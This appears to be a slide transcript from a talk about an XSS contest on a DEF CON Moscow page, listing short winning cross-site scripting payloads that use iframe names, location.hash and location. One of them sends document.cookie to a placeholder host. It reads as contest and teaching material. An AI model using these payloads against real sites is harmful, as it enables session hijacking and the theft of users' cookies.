4.5. contests [extras]
TRANSCRIPT
3
XSS Contest
Trolling is a art: 4 symbols
Омар Ганиев
BETEPOK
data:text/html,<iframe name="1;alert(1);//any code" src="http://www.defcon-moscow.org/secret/contest.php?payload=name">
<iframe name="1;new Image().src='//site/x.gif?'+document.cookie;" src="http://www.defcon-moscow.org/secret/contest.php?payload=name"></iframe>
Contests and more
4
XSS Contest
location.hash: 18 symbols
payload='"'+location.hash#"; alert(document.cookie);
Contests and more
5
XSS Contest
location: 13 symbols
contest.php?*/alert(document.cookie)//&payload='/*'+location
Contests and more